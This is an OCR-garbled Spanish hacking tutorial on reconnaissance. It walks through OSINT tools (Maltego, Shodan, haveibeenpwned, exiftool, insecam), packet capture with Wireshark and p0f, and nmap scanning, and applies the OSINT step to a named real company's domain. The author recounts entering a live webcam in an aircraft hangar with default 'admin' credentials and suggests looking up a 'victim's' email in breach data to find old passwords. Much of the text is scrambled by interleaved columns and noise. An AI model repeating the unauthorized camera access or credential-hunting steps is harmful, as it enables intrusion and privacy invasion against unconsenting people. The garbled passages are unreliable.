diciendo que se grabó la información en la carpeta 


Iroot/data/(nombre de la organización), para 
Company: Target 


Domain: target.com ~— continuar y ver el archivo, basta con presionar 


eel Saree Race espe eee comm A Coen) Gears Sen ees ea eth A Cas pa -- GS Ss eS Se o. A eh aS SNS A > SS SORE SNES NES Ses Sm ey OS o y eet eet pas Gee ee 
Y SAA A o on Soe GENER eee y A  — Goan fad ae SN AAA A A 0 90 10 SER PG aa anD an — 


- ——— — — — — — — — — — EE ST TT i HA Te reer re ee ee ee ÁS ee RR oe 
FO en ee ee ee ee ee ee ee ae ee See 


Company: Organizacion 
Domain: cinepolis.com Scan complete. *** 


Do you have a list of names from salesforce to import? (y/N) n 
Hay que tener en cuenta que a pesar de que no he supporting data folder is located at /root/data/ S 


c 


estamos dejando rastros directos en el servidor del ress <return> to continue. 


objetivo, no es ético investigar organizaciones de 





este modo sin tener autorización previa, ya que 
podrías meterte en problemas si revelas algo 


confidencial, aunque solo estés “experimentando”, 
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Después de abrir varias pestañas en tu navegador, | organizaciones, cometen el error en el que muchos | 


la herramienta te entrega una página similar a esta, | correos que no deberían ser públicos, que, si son, | 
DISCOVER pele Gamal OMA FEE GATE + y por lo que podrían utilizarse para realizar ataques a 


la organización. 


Organización | 


Open Source Intelligence Report 


cine polis. com 


July 15, 7910 


En la sección DNS > Maps, podrás encontrar 
mapas de DNS que te ayudarán a determinar las | 


ubicaciones de algunos puntos claves de su red; 





Í | i ić idor de correo electrónico, o quien les 
aquí organiza en secciones toda la información que EmO SU Serv q 


encontró. da el servicio de hosting. Enseguida te pongo una 


En la sección de contactos > Emails encontrarás pequeña tabla de qué significa cada tipo de 


los correos que recuperó el programa, en muchas registro. 


DISCOVER 


HOME CONTACT: 





ot ON 
eventos 
tundacioníal 
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Registro del host Hosts individuales W 


PTR Registros IP a nombre búsquedas 


En la sección Domain > Whois Domain, podrás 
encontrar al nombre de quien esté registrado ese 
dominio, especialmente en PyMES podrás 
encontrar información útil, es común que el dominio 
sea registrado a nombre del dueño del negocio, y 


generalmente por ahí se podría encontrar 









información sensible. 


apuntadores inversas 


DISCOVER 


| 


Servidores DNS 


El registro maestro para la 


Registro del nombre 





de servicio 








Registro de inicio de 


autoridad 





Y, por último, en la sección Files, podrán encontrar 
los archivos que haya encontrado la herramienta 
en el servidor, usualmente no hay información 
sensible aquí, pero ha habido casos en los que los 
administradores cometen errores como estos, y por 
aquí se obtiene información confidencial, recuerden 


que esto es un juego de quien comete el primer 
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error, y nosotros estamos buscando ese error en | Errores y soluciones 


todas las maneras posibles. La primera vez que lo inicias, hay un error de 


DISCOVER FILES » 


permisos con la herramienta TheHarvester, para 
solucionarlo, solo escribe en la terminal: chmod +x 


jusr/share/theharvester/theHarvester.py 


«$ chmod 4x lusr/share/tnenarvester/thenarvester py 


Maltego 


Maltego es un software multiplataforma que se 
Dentro de este archivo, se puede encontrar un gran Fl 1r E 
$ A especializa en reconocimiento y obtención de 
rango de información del objetivo, desde topología A 
información, particularmente de personas, ya que 
de la red, correos, nombres, archivos en su | A a sb 
puede utilizar información como correo electrónico 
servidor, dominios registrados, ubicación del 
o usuarios, para encontrar datos de alguna persona 
servidor de correos, etc, pero todo esto el 
o sus conocidos. 
programa cómodamente te lo dará cómo reporte en 
Para utilizar esta herramienta, debes empezar por 
la sección de reportes, que te ayuda a organizar | 
crear una cuenta en Paterva (los creadores de la 
mejor la información para posteriormente de a 
herramienta) en la siguiente liga (es gratis): 


https: //www.paterva.com/web7/community/commun 
ity.php 


reportarlo. 
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Community 
Registration 


Una vez que hayas creado tu cuenta, es tiempo de 
abrir el software en tu sistema Kali de la siguiente 
manera: 


Escribe en la terminal Maltego 


~# maltegoh 









Al abrirse, entraras 
al software con la 


cuenta que acabas 


Enter your details below ta log In to the Malt=go Com runy s ; 
Or it you have not dona s3 yet ~egister h 













de crear ingresando 


Login $ = 
$ Email Address: cuentalBgmail com 









Password 


tus datos en la 






siguiente pantalla y 
presionando * Solve captcha 
siguiente en todo lo 


demas. 
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PIPPI 


Al llegar a la pantalla principal, presiona este botón, 


y se abrirá lo que conocemos en Maltego como 


graph(gráfica). 


hh Create a new graph. 


(Ctrl+T/Cmd+T) 


oa ee AA ae et 


nee is SS ee ee a Er 


Click the help button to get more help 
on Maltego featur... 





Este, esencialmente es tu espacio de trabajo, en 
donde vas a realizar tus investigaciones, notaras 


que a la izquierda hay un menu llamado “entity 
palet”, esta herramienta, hay un objetivo que se 
llama entidad, que simboliza la información y tipo 
de información que estas pidiendo o poniendo a la 


herramienta. 
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Aquí están algunas de las “entidades” disponibles 
en Maltego, en la paleta de entidades puedes 


verlas catalogadas por el tipo de información que 









busca obtener esa entidad. 








| Twitter hashtag 


E Hashtag I 








f raros ota E social retacrk 





a prre "y 




























































































































































































































: ALÍ Members! ETE "ZE O A zl À | tation of 
s| Affiliation - Fli.. | Membership of the Flickr social network a — es someting | 
_ _ _—___—_—_——— + lo IPv4 Address — | An IP version 4 address 
| Affiliation - Ta a Membership of pi T | q Location la location on Mother Earth 
T „Alias An alias for a person a MX Record A DNS mail exchange record i 
An internet Autonomous System (AS) * Netblock A range of IP version 4 addresses 
| | Nominatim Lo... | Nominatim Location 
| Banner [Banner 9 Nomina | re LotRO 
A BuiltWith Rela... JA Relationship identified by BuiltWith B NS Record A ONS name server record 
EN E AS taio i j h distri fo 
bu BuiltWith Tec... | A Technology identified by BuiltWith spanien ia social group which distributes biki 
y | 7 - it Person ‘Entity representing a human 
H ircular Area A circular area somewhere on Ea TU: A IPhone kumbar. |A telephone number 
al Phrase ‘J | Any text or part thereof 
¿Port lA TCP/UDP network port 
F DNS Name Domain Name System server name lols Sentiment me represent the sentiment nt towards 1] 
i Document A document on the Internet E si | Network service (port and banner com 
) Domain p? interne domain E Tracking Code | Represents à tracking code for a web se 
; mall Add - —- pea h h 7 i i Tweet Tweet entity 
ena = ¡An Se A an Twitter User List Twitter User List entity 
È File Í A file stored internally i in the graph = URL | An intenet Uniform Resource Locaor 


















te) } GPS Coordin... | A location on a World Geodetic System coord.. E Website “An internet website 
Y Hash | Hash entity A Website Title | Title of a website 


Ahora, para empezar una investigación, debes 
tomar alguna entidad de la cual tengas información 


de la paleta de entidades, y jalarla a la gráfica, una 
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vez en ellas, haz doble clic al texto de la entidad, y 
modifica el texto por la información que tú tienes. 
Por ejemplo, vamos a asumir que queremos 


investigar a una empresa y tenemos el nombre del 


O. 


LcEcomN 


dominio de su sitio. 





Después de tener la entidad en la gráfica, y haber 
modificado la información, vamos a hacer clic 
derecho en la entidad, y aparecerá un menú 
llamado transformaciones, este es otro 

“objeto” de Maltego, este hace referencia a que 
podemos “transformar” una entidad a otra por este 
medio. Por ejemplo, si nosotros tenemos un 
dominio, y queremos los correos electrónicos de 
este, entonces vamos a “transformar” el dominio a 
correos electrónicos. 

Para hacer esto, basta con hacer clic en los 
símbolos de “+” para ver las opciones, y en los 


símbolos de flechas para iniciar la transformación. 
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+ All Transforms 
+ DNS from Domain 


+ Domain owner detail 


SULIOJSUBJ | 


+ Email addresses from Domain 





+ Files and Documents from Dom... 
BAIX LR. 


Posterior a la transformación (en este caso le puse 








“all transforms’), les aparecerá algo similar a esto, 
que muestra todo lo que pueda encontrar la 
herramienta, entre las opciones están: servidores, 
correos electrónicos, números telefónicos, y 


nombres de personas dentro de la organización. 


4 
j 


5 jE jE 
¡6 ' ig 


ip i< ieie ie jt 


ip |< 16] 


[e ¡E j 


Todas las líneas azules representan conexiones, y 
los símbolos, representan entidades, para este 


punto probablemente ya encontraste algo de 
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información útil de tu objetivo, pero, todavía puedes 
ir más lejos, realizando transformaciones de los 
resultados, de la misma forma en la que te mostré 


anteriormente. 








Aquí, por ejemplo, la herramienta nos dice que ese 


correo es de esta persona en especifico. 


Maltego es una herramienta bastante completa y 
poderosa. Te recomiendo buscar documentación 


acerca de esta herramienta y su uso. 
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El buscador de los hackers 


Shodan es un buscador, pero no cualquiera, le 
llaman el “buscador de los hackers”, y el “buscador 
más peligroso”, fue desarrollado en el 2009, y a 
diferencia de otros motores de búsqueda, Shodan 
busca información específica que puede ser muy 
útil para un hacker. 

Shodan toma banners, puertos y servicios, e 
información de la red, para ayudarte en la etapa de 
reconocimiento de forma que puedas obtener 
suficiente información como para empezar a 


planear un ataque contra algún sistema. 


Para hacer esto, Shodan se aprovecha que casi 
todo nuevo dispositivo hoy en día tiene una interfaz 
web que facilita la administración remota, y aquí es 
donde Shodan se aprovecha, todos los dispositivos 
que estén disponibles en la red: desde señales de 
tráfico, cámaras, servidores, routers, bases de 


datos y sin fin de dispositivos que pueden ser 
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encontrados por Shodan y potencialmente 
comprometidos. Debido a esto, es el buscador 
favorito de los hackers e investigadores en 
ciberseguridad. Se ha documentado casos donde 
activos se ven comprometidos debido a fallas 
encontradas por este buscador. 

Para empezar a usar Shodan, lo primero que tienes 


que hacer es ingresar a https://shodan.io y crear 


una cuenta. 


Shodan Exploits Scanhub Maps Blog Anniversary Promotion Register 


TE O <= 


EXPOSE ONLINE DEVICES. 


WEBCAMS. ROUTERS. 
POWER PLANTS, IPHONES. WIND TURBINES, 
REFRIGERATORS. VOIP PHONES. 





di nf 


ing DEVELOPER APL | LEARN MORE i FOLLOW ME 
byt heat ; at mo out of chas Cohr mé and it 
Wan Sor s ap + Ruby 0 A : le vou reed é tue 


Shodan tiene una versión de paga, pero a menos 
que lo uses funciones avanzadas, podrás acceder 


a la mayoría de sus funciones de forma gratuita. 
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RAG 14 ad Ray UE 10 GRG 
wth the latest features of Shodan 











Ahora, al ingresar a Shodan, tendrás dos opciones 
principales, la primera es hacer una búsqueda 
específica, lo cual es particularmente útil si ya 
sabes tú objetivo (por ejemplo, servidores de algún 
tipo o en algún rango de IPs), y la segunda, es 
entrar a los “directorios de búsqueda” de Shodan, 
que te mostrará algunas de las búsquedas más 
comunes y recientes. 


Empezaremos por la segunda. 


Explore 





Huaraz 
Como puedes ver, podrías aquí utilizar las 


búsquedas recientes para encontrar cámaras web, 
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bases de datos, o sistemas de control industrial, 
incluso es posible entrar a cámaras de los 


semaforos. 





@ 33; Login ::: 


Fie: Eraktl Scene AN Date. Pee. 17 Suk 08 2.0, or 


= 
f 
eo | 
g 
E 


Al seleccionar una categoría, o hacer una 
búsqueda, te dará una pantalla similar a esta, en la 
que nos muestra cuantos activos encontró y de qué 


países, los banners que nos dan algo de 


163 





PARESI 














información de su sistema (Linux, protocolos, 
servicios, etc.), y si hacemos clic en el título, por 
ejemplo en “:::LOGIN:::”, nos enviará a la página 
del activo, donde podríamos intentar entrar debido 
a alguna vulnerabilidad, o contraseña débil (es muy 


común que dejen las contraseñas/usuarios de 


: AXIS, AXIS 212 PTZ Network Camera Live View | Setup | Help | 
Video forrat oca 
| Ca) | C 


NA, 





Este, por ejemplo, es una cámara web dentro de un 
hangar de aviones, con control en java suficiente 
como para permitirme mover la cámara y ver en 


vivo lo que esté pasando dentro del lugar (tal y 
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il 


como te lo imaginarias en una película de 
Hollywood). 

Para entrar aquí, lo único que hice fue seleccionar 
una de las ligas, buscar las contraseñas/usuarios 
de fábrica posibles, e intentar todas las 
combinaciones (usualmente es “admin”, “admin” o 
algo similar), y me dio acceso. 

Ahora, una pequeña advertencia: dentro de este 
buscador se pueden encontrar dispositivos con 
información sensible como bases de datos, 


luces de tráfico, o cámaras de tráfico, entrar a 


estas, o manipularlas de cualquier forma sin 
permiso, podría meterte en problemas legales. 


Para encontrar algo en particular basta con hacer 
una búsqueda especifica en la barra de búsqueda, 
como, por ejemplo, especificar qué quieres un 
sistema Linux, o Windows, o con cierto banner de 
algún fabricante de software o hardware que 


desees atacar. 
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¿Has sido hackeado? | 
'---have i been pwned? 


lle 1ti í 
gar a ser bastante útil, se llama Check if you have an account that has been compromised in a data breach 


| hotmail.com pwned? | 


1 
o 


Esta herramienta, aunque muy sencilla, puede 


haveibeenpwned, y puedes encontrarla en 


https://haveibeenpwned.com. 


Tiene una base de datos de las filtraciones de 












datos de usuarios más grandes, como ha sido . 


Dropbox, Adobe, LinkedIn, Yahoo!, entre otras, y 


en su buscador puedes buscar los correos 


Sj el correo ha sido comprometido, aparecera en 
donde, cuando, y que ha sido comprometido en la 


parte de abajo, algo similar a este ejemplo de 


electrónicos para ver si han sido filt 
rados en alguna 
LinkedIn. 


de estas bases de datos. 


Linkedin: In May 2016, Linkedin had 164 million email addresses and passwords exposed. Originally hacked in 


¿Para que pudiera servirte? Con esto podrías darte 
| y 2012, the data remained out of sight until being offered for sale on a dark market site 4 years later. The 


passwords in the breach were stored as SHA1 hashes without salt, the vast majority of which were quickly 


cuenta de los servicios a los que esta registrado tu 


cracked in the days following the release of the data. 


objetivo, y potenci 
J y p cialmente hasta obtener alguna Compromised data: Email addresses, Passwords 


credencial vieja de este, si es que la encuentras en 





Esta herramienta también te puede ayudar a 


auditar que tan buena es tu seguridad personal, ya 


la base de datos. 


¿Para usar la herramienta, simplemente ingresa el 


correo electrónico de tu víctima, y haz clic en que, si tus proveedores son hackeados, tu 


pwned? información está comprometida. 
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Encontrar con que están hechas las 
páginas web i 


Builtwith es otra herramienta muy sencilla en la 
web, te ayudará a identificar con que tecnología fue : 
creada una página web, lo cual es generalmente lo 


primero que verificó cuando estoy viendo como 


auditar a una página web. 


Find out what websites are 


Built With 


Enter a website address, a technology name or a keyword 





Al poner en la búsqueda la página web, te dará una 
lista de tecnologías que utiliza, aquí puedes 
identificar fácilmente si está desarrollada con 
WordPress, Bootstrap o cualquier otra tecnología. 
Puedes entrar en https: //builtwith.com 
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Encontrar versiones anteriores de páginas 
web 


Archive, o también conocido como 
WayBackMachine, podría definirla esta herramienta 
cómo “la máquina del tiempo” del internet, en esta 
herramienta, a la cual puedes acceder en 
httos://archive.org, puedes realizar búsquedas de 
páginas web antiguas o versiones anteriores. 

Te podría servir para encontrar información, ligas o 
documentos que los administradores hayan 
borrado o corregido, pero tu podrás encontrar sus 
errores pasados si usas estas herramientas. 

Basta con escribir la URL de la página que deseas 


investigar. 


E 
O nier 11D! ibarra 
eh OGLE nE UP ASE 
` 
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Y te dara un calendario de paginas viejas que ha Encontrar ubicaciones por medio de una 


guardado la herramienta. foto 


- Aveces, nuestro objetivo sube fotos o archivos a la 


ms a seme taski Í i 
S37 a 10992 300% 2007 2002 2003 2004 2005 2008 2097 2002 2009 20109 24M 2012 2913 





red, y no sabe que en ellos hay meta data, es 
decir, información no visible que es parte del 
archivo, que nos puede dar información importante. 
Por ejemplo, la meta data nos podría dar 
información del usuario que creó algún archivo, el 


sistema operativo que se utilizó para crearlo, 





cuando se creó, o incluso, a veces hasta 


ubicaciones de donde se tomó, por ejemplo, una 


fotografía. 


Para eso existen herramientas como exiftool, que 


Si haces clic en cualquiera de esas fechas toma los metadatos de una fotografía y te los 


marcadas, puedes encontrar páginas web muestra. Para utilizar la herramienta, basta con 


guardadas de esa fecha. mandar llamar la herramienta, seguido de la 


dirección de la imagen en la que queremos 


encontrar información. 


:=/Desktop* exiftool foto. jp 
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Podemos esperar una respuesta similar a esta: 


Image Height 536 

Encoding Process : Baseline DCT, Huffman coding 
Bits Per Sample 38 

Color Components 003 

Y Cb Cr Sub Sampling « YCHCrA7250 (2) 2) 

Aperture A 

GPS Latitude i jeg 

GPS Longitude deg 

GPS Position : deq 

Image Size ; 2048x1536 

Megapixels 

Scale Factor To 35 mm Equivalent: 

Shutter Speed i 

Create Date + 2018:07:17 19:26:23.0278 
Date/Time Original + 2018:07:17 19:26:23,0278 
Modify Date ' 2018:07:17 19:26:23.0278 
Thumbnail Image : (Binary data 17025 bytes, use -b option | 
ract) 

Circle Of Confusion : 0.004 mm 

Field Of View 115-080 

Focal Length 3.0 mm (35 mm equivalent: 25.0 mm) 
Hyperfocal Distance : 1,44 m 

Light Value HS 


Por ejemplo, en esta foto se pudo encontrar la 
ubicación geográfica de donde se tomó la foto en 
base a la meta data del archivo, también se obtuvo 
el nombre del dispositivo que la tomo, y el modelo 


del celular con el que se tomó. 
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Entrar a cámaras de seguridad 


Este es otro buscador, te muestra cámaras web en 





vivo que puedes acceder directamente, y cierto, en 
Shodan podrías encontrar lo mismo, pero no con 
tanta facilidad ni confiabilidad, aquí todas las 
cámaras están 100% abiertas sin esfuerzo. 

Por ejemplo, busque México, y me muestra todas 


las cámaras en México que están abiertas: 


iA 
; 


E to 
a ees S55 





Hatch WebcamXP cimera in Mexico Caxlat Obregon Walch Axis camara in Mexico Tehuacan 


Este servicio es más para demostración de todas 
las cámaras que se pueden encontrar y entrar, por 


ejemplo, en Monterrey hay algunas disponibles 
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Pr rri 


dentro de oficinas de empresas, las cuales podrían El ejemplo demostrado es de LOñ Y 
poner en riesgo la seguridad de dichas empresas. | Gmail, pero Outlook y las otras = 
Puedes entrar en https://www.insecam.org/ . | alternativas también tienen una a | 
opción similar. al | 
Rastreo de IP e información en email | + Fora | 
| @ Pin | 


A veces vas a lograr obtener informacion tal como | 


j co <> Show original 
la IP o incluso un correo electrónico, y desde ese | ia A A 


punto puedes sacar más información. Por ejemplo, De esta pantalla puedes darte cuenta de 


si tienes una IP, podrías sacar información de qué información que se puede obtener, como la IP 


ciudad proviene y hasta potencialmente (si es una 


desde donde se envió (lo cual podría delatar el 
| servidor SMTP), pero, la información interesante 


IP asignada a una empresa) de que empresa vino y 


| z . . r 
donde está localizada, para esto, podrías usar | esta en la parte inferior, en donde podras obtener 
| 


servicios tales como https://ipinfo.io y simplemente todavía más información, incluyendo si al enviarse 


el servidor cuenta con encriptación o no. 








ingresar en el buscador la IP que quieras 
encontrar. Original Message 
Por otro lado, es posible obtener información passage 1 
adicional de la meta data de un correo electrónico, | pee A saci 
para hacer esto, basta con abrir el correo | ‘ial 
electrónico, y ponerle en la opción de “ver original”. | To 
Subject 
SPF: NEUTRAL with IF earn more 
DKIM: 'PASS with doma Learn more 
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Se ve como información inútil y poco entendible a Reconocimiento en red pasivo 


primera vista, sin embargo, al copiar y pega el i A ; . 
A veces necesitas obtener información de sistemas 


código en esta dirección como 
dentro de tu red local, o que están haciendo 


https://whatismyipaddress.com/trace-email, podría | : 
conexiones con tu sistema, para esto, existe una 


empezar a hacer más sentido. 
herramienta llamada POF. 


Lo que hace POF, es que interpreta los paquetes 


oe — que entren a la interfaz, e intenta interpretarlos 


Trace Email Analyzer 


Paste the header you've copied in the box. 











| para obtener de qué sistema fueron enviados. 
| Para utilizar POF en Kali, basta con escribir el 
comando pOf -i <interfaz>, en donde <interfaz> es 
el nombre de interfaz en el que vas a escuchar los 


paquetes. 


| 
+ pOf -i etho 





Ahora, esto solo está escuchando e interpretando 


él 





z : paquetes en tu interfaz, así que por sí solo 
Find Email Sender 


Basta con di | i i 
pegar el código de los metadatos en | combinado con otras herramientas, como por 








probablemente no te será útil, sin embargo, 

esta caj | s j . i 
ja y presionar el botón rojo. | ejemplo ettercap, que se ve en capitulos 

posteriores, te podria ser muy util. 

Como respuesta, podrias esperar de esta 


| herramienta algo similar a lo siguiente: 
| 
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. ; = lá 
.-[ 192,168.1.67/60144 -> 35,166,234,151/443 (syn) ]- Al abrirse, te aparecerá una pantalla similar a 


client 
OS 


| 192.168.1.67/60144 siguiente, en donde te muestra varias interfaces 
| 

| dist 

| 

| 

| 


NU ewer que podrías seleccionar para interceptar paquetes 
0 


none 
4:64+0:0:1460:mss*20,7:mss,sok,ts,nop,ws:df, ids. 


params 
raw sig 


en estas interfaces. 


£ Ver tom ee 
fie a Cea 3 (nese dejos Metas Ido pides $ ms 


is O ñ ri Gee le 
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Videos to Vredu 


Que como ves, te muestra la IP y puerto de donde 





. M rlan dom + 


org m tr Tite = P _ 


se mando el paquete syn, y el posible sistema | O 








Liah b a 
esto L 


operativo a donde pertenece este paquete. | Antes que selecciones una, quiero que te vayas a 


i lia estaña de Edit > Preferencias, y aquí hacer 
WireShark - Análisis de paquetes Aip 


clic en protocols, estos son todos los protocolos 


Wireshark es una de las más grandes que WireShark conoce y acepta, adicionalmente, si 





herramientas para ingenieros en software y | haces clic en uno, podrás ver que en algunos 
hackers, esencialmente es un analizador de 
paquetes, es decir, captura todos los paquetes en 


la interfaz que le mencionas, y te muestra cada 


puedes modificar algunos factores como ingresar 
laves de desencriptación para desencriptar los 


paquetes que entren bajo ese protocolo. 
ed len per En la imagen muestro como podemos interceptar 


Para ejecutarlo, basta con escribir WireShark en la paquetes wifis en el protocolo IEEE 802.11, e 


terminal o abrir la aplicación por su icono. 


‘—# Wlreshar 


ingresar claves de desencriptación WEP y WPA. 
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Wireshark « Preferences 















7 Appearance ; Protacols 
Columas 
Font and Colo Display hidden protocol items 








Layout E ; 
Capture Display byte fields with a space character between bytes 
Expert Look for incomplete dissectors 






E Filter Buttons 
i + Name Resolution 





Enable stricter conversation tracking heuristics 
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3GPP2 All 
GLOWPAN 
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Wirestatk Preferences 


HIP 
HiQnet 






` IEEE 802.11 wireless LAN 












































HISLIP y Reassemble frag = ERNA 
WEP A : 
HL? and WPA Decryption Keys 
ignore vendor-g 
HNBAP Key type Key 
HP_ERM Y Call subdissectd | a i 
HPFEEDS 
HSMS Assume packet 
HSRP ¥ Validate the FCS 
HTTP i 
HTTP? Ignore the Protects ` 
IAPP 2 No 
e Yes - witho 
ICAP Yes - with | 
en WPA Key MIC Lend 
Configuration Profiles... USA. d icP Y. Enable decryption 












ica 
Decryption keys Edit. 





Ok, ahora si, en la primera imagen, haz clic en la 





interfaz que estés utilizando (probablemente es 


donde veas mas lineas activas) y haz clic en el 


boton de la aleta azul , O simplemente haz | 


doble clic en la interfaz. 
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Pree 


Inmediatamente empezara WireShark a mostrarte 


todos los paquetes capturados en la siguiente 


pantalla. 




















' ; -Üp 
si - “= — — 
ne pm r rat Ratoi Lege tty 
A Eiti 1.114.41.14 SARE NE i i 25 ai 

ELS Lapid MAIS. 72.303 Sput 24 > of 8 ueis 

wnt 11510 eR Re HW AIFS 

i ori TRC RAU] ie KiE z $e si = 

see in. N 259-255. meg as sn sens Lt 

gjatat 572 188 A K 1112113 £ a SBE H A 

Mi UA 11.20 tu 192.144.182 $ (44 443 - $e Er ux ie ? ri 1 e? 

MISA 117.154,195.49 157.108.182 e Lo “ao de tdi 
s HETA AIH 1 13 ma = aitis Y = aa =- E =z 
EA E CF ELO E an TED ETIENNE 

: TE Erzsé ari # 
AH meni | A a Mat A A ay ees y si se a E mol 
Lor Miiri Sik e Bebesi e AE 14 H E 

samen bal am treat Me te das 1 se + tell 199.148, 

fr >. dE 1 14 i iss 2.2.82 wes Sst op 24,4 t 

TE ANO 53 ah inpe wer 

te ee Se 17.5 pe ma RARA Ma es $ 

Lana I 1.43 115.14 + ig A E + t 

4) 4 (mt ro 12% 10 wit A w Sun s4 3 te =w 

imei 192.161,1,4 il TORES a w 14 10901 par La 4 1 : $s = TEARS FETH 

ism 10E 195.118 249.510 3 $38 igandusd quee de e r beaten AELA. tep heal, “A” aesti 779 PERUANO mare cs 

Aca cueste 382 122 4 15 255 A ae 355 Stance? ey PLETE SEIU IAE AMD TONES tole prvglocast, top; lecal, "QU" question PTR stanbies 


at ot wire e (12 bits Bark p wate (35 
Eo HE nia, Da. alli ANA Ai 


+ Paternal Protoced versio 4, Srey MEEA $ fete LESELE 
Kreecrission Costrol fratece), Sre Part’ 31174, Ext ‘fart 12, St 3, Ak; MM, Less Y 
jer Prutas - 


Quizas podria verse al inicio un poco intimidante, 
pero, realmente es bastante sencillo de interpretar, 
la barra de navegacion de arriba te permite filtrar 
los paquetes en base a tipo de protocolo, fuente o 
destino del paquete (de donde o a donde se 
envió), puerto utilizado para enviar o recibir, entre 
otras cosas, un ejemplo podría ser si escribes http 
en el filtro, te mostrará todos los paquetes enviados 
en el protocolo http, que son usualmente paquetes 
en un navegador, y si escribes por ejemplo 
ip.src==<jp>, te mostrará todos los paquetes que 


se mandaron desde la fuente de la IP que hayas 
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t Frame 72; 149 bytes on wire (1192 bits), 149 bytes ca 
ptured (1192 bits) on interface 0 
' Ethernet II, Sre; Micro-St_7f:7f:ee (4c:cc:6a:7f:7f:ee), Dst: Shenzhen 4d:af:28 (d8:37:be:40 
» Internet Protocol Version 4, Src: 192,168,1,83, Dst: : y 
+ Transmission Control Protocol, Sre Port: 51326, Dst Port: 8 | 

0, Se 

- Hypertext Transfer Protocol si A 
» GET /poll?push. id=4e0b6ff6- -300f- 4002-99ef 961609592400 HTTP/A. 4\r\n SERA a 
Host: push, bitdefender ,net\r\n | rs 


rin 
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especificado, ip.dst==<ip> muestra los paquetes 

que se hayan mandado a esa IP. 

Por otro lado, puedes ver más detalles de un 

paquete en la sección inferior (la gris), que muestra 
por capas del modelo OSI, La información de ese 
paquete, desde los bits, hasta lo que está dentro 

del paquete. 

En el ejemplo siguiente, analizando el paquete 

HTTP, podemos ver de qué dirección MAC a que 
dirección MAC se envió, luego, que se envió de la 
dirección IP 192.168.1.83 a otra dirección IP, que | 
es un paquete TCP que se envió desde el puerto | 
91326 al 80, y finalmente que es un paquete en el 
protocolo HTTP, y dentro de esta sección, el 


método HTTP que utilizo, y el contenido de este. 


[Full request URI: 
= 


[HTTP request 2/2] 
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Para este punto ya te habras dado cuenta de que 
Wireshark te da mucha informacion de la data que 
se transmite por tu interfaz, pero de seguro te 
preguntaras: ¿En qué me sirve? Bueno, al hacer 
una prueba de penetración o incluso asegurando 
una red, esta información se vuelve 
extremadamente relevante, por ejemplo, si 
entiendes como funciona un ataque, podrías 
interpretar de los paquetes si está sucediendo uno 


y desde donde. 


Por medio de WireShark, en los siguientes 
capítulos veremos cómo realizar espionaje en una 
red, y por medio de WireShark podrías identificar si 
alguien está haciendo este tipo de ataques en tu 
red fácilmente (lo mencionare al llegar a ese tema). 
También, imaginemos que estás intentando 
identificar a donde se conecta alguna aplicación 
tuya, o un malware en un ambiente controlado 
tuyo, podrías obtener esa información fácilmente 
mientras que los paquetes pasen por la misma 


interfaz, WireShark incluso puede ser utilizado 
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junto con herramientas de intercepción de data Reconocimiento Activo 

ara hacer que paquetes de otros sistemas pasen l _ 
i 3 jii i ya que terminamos de realizar reconocimiento de 
por nuestra interfaz, de forma que podamos nae iva raval 
l , o, forma pasiva, sigue el reconocimiento activo, igua 
espiarlos, incluso podríamos utilizar interfaces o, —— 
que el reconocimiento pasivo, tiene algunas 
fuera del internet, como un SDR para emular una l 
ventajas y desventajas. 
red celular e intervenir mensajes de texto o , bié 
_ La principal ventaja y razon por lo que esto tambien 
llamadas telefonicas, pero eso es algo mas 
i , es indispensable, es que este tipo de 
avanzado, el punto aquí es que WireShark es una ui 
reconocimiento es altamente confiable, y nos dirá 





herramienta bastante completa y poderosa, y v . 
j dj A cosas esenciales, como sistema operativo, puertos, 
la pena que lean más al respecto, ya que tendría : 
servicios, e incluso aquí podremos empezar a 
que escribir un libro completamente dedicado a E ; 
identificar vulnerabilidades, la desventaja del 
WireShark para explicarlo de lleno. 


; . reconocimiento activo es que aquí vamos a “tocar 
Mientras te dejare una fuente donde puedes leer de opa 2 
directamente a los objetivos, entonces si no SOMOS 
otros tipos de comandos para filtrado de paquetes. 


cuidadosos, nos puede detectar algún IDS o IPS y 
https://wiki.wireshark.org/DisplayFilters 


bloquear el acceso facilmente. 

También, es importante mencionar, que esta 
actividad es sensible, es decir, si escaneas un 
sistema sin permiso, estas realizando 
actividades potencialmente ilegales y puedes 


meterte en problemas. 
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Nmap 
Nmap, a veces llamado la navaja suiza del 


hacking, es una herramienta escrita en Python para 
escaneo y reconocimiento de sistemas. 

Es decentemente facil de usar, pero increiblemente 
poderosa, el fundamento de nmap, es que manda 
paquetes TCP o UDP, y analiza las respuestas del 
sistema a estos paquetes, y con su base de datos, 
asume informacion del sistema, pero a pesar de 
que son asunciones, tiene un alto grado de 
confiabilidad. 

Por ejemplo, digamos que quisiéramos saber qué 
servicios está corriendo el sistema en 
scanme.nmap.org (escaneamos este sistema ya 
que tenemos permiso explícito para hacerlo, si 
hiciéramos esto con otro sistema, a menos que sea 
nuestro, estaremos cometiendo un acto ilegal). Lo 


que sucede con este scan, es mandar paquetes 
TCP SYN a todos los puertos donde 
potencialmente el sistema esté corriendo los 


servicios, cuando responde que sería en 
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ACK/SYN, significa que ese puerto está siendo 
utilizado, y el servicio default en ese puerto es el 
que más probable está siendo utilizado 
(recordemos que los servicios corren por defecto 
en un puerto en específico, por ejemplo, el HTTP 
en el 80, el SSH en el 22, etc.). 


Para hacer lo que previamente describí, basta con 


escribir el comando nmap -sV scanme.nmap.org 


‘~# nmap -sV scanme.nmap.org 





Quiero que pongas atención a la estructura para 
utilizar nmap. Primero, escribiremos el nombre de 
nmap para mandar a llamar la herramienta, luego 
escribimos el comando que se va a utilizar, 
representado por un guion, seguido de letras que 
representan algo que quieres que haga la 
herramienta, en este caso fue -sV, que significa 
“service version” (versión de servicios), y, por 
último, le damos el objetivo al cual va a escanear.** 
**Nota: no tiene que ser un dominio, puede ser una 


IP. o varias. También, puedes pedir varias acciones 
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en el mismo comando, de cualquier forma, puedes 
considerar esto como la estructura de utilización de 
nmap: nmap -<comando> <objetivo> 

Luego de realizar ese comando, recibimos una 
respuesta, aquí podemos ver que nos muestra lo 
que pedimos en orden. 

Primero nos muestra la IP que fue escaneada, y si 
está disponible, seguido de cuatro columnas, que 
nos muestra el puerto que se detectó abierto, y si 
es un puerto tcp o udp, el estado en el que se 
encuentra, el servicio que está corriendo en este 


puerto, y la versión de este servicio. 


Nmap scan report for scanme.nmap.org (45,33,32,156) 
Host is up (0,0515 latency). 

Other addresses for scanme.nmap.org (not scanned): 2600;3c01::f03c:91ff:fe18:D02f 
Not shown: 995 closed ports 

PORT STATE SERVICE VERSION 

22/tcp open ssh 
25/tcp filtered smtp 
80/tcp open http Apache httpd 2,4.7 ((Ubuntu)) 
9929/tcp open nping-echo Nping echo 

31337/tcp open tcpwrapped 

